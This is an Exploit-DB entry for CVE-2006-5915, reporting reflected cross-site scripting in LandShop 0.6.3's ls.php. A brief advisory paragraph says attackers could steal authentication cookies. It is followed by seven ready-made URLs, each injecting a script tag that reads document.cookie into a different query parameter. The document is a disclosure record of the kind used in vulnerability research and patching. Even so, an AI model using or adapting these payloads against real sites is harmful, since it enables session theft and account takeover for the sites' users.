LandShop 0.6.3 ls.php Multiple Parameter XSS

2006-11-09T00:00:00
ID EDB-ID:28950
Type exploitdb
Reporter laurent gaffie
Modified 2006-11-09T00:00:00

Description

LandShop 0.6.3 ls.php Multiple Parameter XSS. CVE-2006-5915. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20989/info

LandShop is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, access or modify sensitive data, execute arbitrary script code in the context of the application, compromise the application, and possibly exploit latent vulnerabilities in the underlying system; other attacks are also possible.

http://www.example.com/PATH/action/ls.php?lang=en&action=list&start=</textarea>'"><script>alert(document.cookie)</script> http://www.example.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=</textarea>'"><script>alert(document.cookie)</script> 
http://www.example.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&keyword=</textarea>'"><script>alert(document.cookie)</script> 
http://www.example.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&keyword=&search_area=</textarea>'"><script>alert(document.cookie)</script> 
http://www.example.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&keyword=&search_area=&search_type=</textarea>'"><script>alert(document.cookie)</script> 
http://www.example.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&keyword=&search_area=&search_type=&infield=</textarea>'"><script>alert(document.cookie)</script> 
http://www.example.com/PATH/action/ls.php?lang=en&action=list&start=20&CAT_ID=1&keyword=&search_area=&search_type=&search_order=</textarea>'"><script>alert(document.cookie)</script>